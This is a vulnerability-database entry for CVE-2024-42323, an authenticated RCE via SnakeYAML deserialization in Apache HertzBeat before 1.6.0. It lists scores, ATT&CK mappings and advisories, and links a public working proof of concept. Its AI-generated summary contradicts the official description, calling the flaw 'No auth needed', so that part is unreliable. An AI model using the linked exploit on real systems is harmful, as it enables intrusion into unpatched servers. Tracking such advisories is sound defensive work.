CVE-2024-42323

HIGH

Apache HertzBeat < 1.6.0 - Authenticated Remote Code Execution via SnakeYAML Deserialization

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2024-42323. PoCs published by forwjm.

AI-analyzed exploit summary This repository contains a functional exploit PoC for CVE-2024-42323, leveraging a Spring Framework XML bean configuration to execute arbitrary commands (e.g., `cat /flag`) via `ProcessBuilder`. The exploit demonstrates remote code execution (RCE) by abusing insecure deserialization or bean initialization in Spring applications.

Description

SnakeYaml Deser Load Malicious xml rce vulnerability in Apache HertzBeat (incubating). This vulnerability can only be exploited by authorized attackers. This issue affects Apache HertzBeat (incubating): before 1.6.0. Users are recommended to upgrade to version 1.6.0, which fixes the issue.

Exploits (1)

github WORKING POC

by forwjm · poc

https://github.com/forwjm/CVE-2024-42323

View Code ZIP pw:eip

This repository contains a functional exploit PoC for CVE-2024-42323, leveraging a Spring Framework XML bean configuration to execute arbitrary commands (e.g., `cat /flag`) via `ProcessBuilder`. The exploit demonstrates remote code execution (RCE) by abusing insecure deserialization or bean initialization in Spring applications.

Classification

Working Poc 90%

Attack Type

Rce

Complexity

Trivial

Reliability

Reliable

Target: Spring Framework (version not specified)

No auth needed

Prerequisites: Vulnerable Spring application with XML bean configuration support · Ability to upload or inject malicious XML configuration

MITRE ATT&CK

T1190 - Exploit Public-Facing Application T1059 - Command and Scripting Interpreter T1203 - Exploitation for Client Execution

devstral-2 · analyzed May 24, 2026 Full analysis →

References (3)

Core 3

Core References

Mailing List

http://www.openwall.com/lists/oss-security/2024/09/21/1

Mailing List, Vendor Advisory vendor-advisory

https://lists.apache.org/thread/r0c4tost4bllqc1n9q6rmzs1slgsq63t

Mailing List, Vendor Advisory vendor-advisory

https://lists.apache.org/thread/dwpwm572sbwon1mknlwhkpbom2y7skbx

Scores

CVSS v3 8.8

EPSS 0.7555

EPSS Percentile 98.9%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment

Exploitation none

Automatable no

Technical Impact total

Details

CWE

CWE-502

Status published

Products (1)

apache/hertzbeat < 1.6.0

Published Sep 21, 2024

Tracked Since Feb 18, 2026